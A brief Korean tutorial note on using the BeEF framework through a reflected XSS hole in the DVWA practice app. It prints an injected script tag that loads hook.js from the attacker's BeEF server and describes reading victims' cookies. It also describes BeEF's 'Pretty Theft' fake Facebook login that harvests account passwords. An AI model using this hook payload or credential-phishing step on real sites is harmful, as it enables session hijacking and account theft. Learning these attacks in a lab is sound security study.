1) XSS 취약점 발견
2) beef 실행할때 나왔던 스크립트문을 취약한 포인트에 삽입한다.
ex) http://localhost/dvwa/vulnerabilities/xss_r/?name=<script src="http://127.0.0.1:3000/hook.js"></script>
3) 스크립트가 실행되면 BeEF 의 detail 패널에서 (127.0.0.1:3000/ui/panel) Victim 의 쿠키정보를 포함한 다양한 정보를 확인 할 수 있고, command 탭에서 수행 가능한 공격들을 확인 할 수 있다.
4) Pretty Theft 라는 command를 사용하여 페이스북 아이디를 탈취 할 수 있다.
스크립트가 실행된 이후 pretty theft 를 클릭 하고 오른쪽 하단의 execute 를 실행하면 페이스북 로그인 알럿이 뜬다. 사용자가 의심없이 아이디 패스워드를 입력하면 공격자에게 계정이 넘겨지게 된다.
# 참고
- http://elmosec.tistory.com/4
- how to hack web browsers with beef - https://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-web-browsers-with-beef-0159961/
- http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.Phmc7sTP.dpbs
- http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/#sthash.dCGqRp4M.dpbs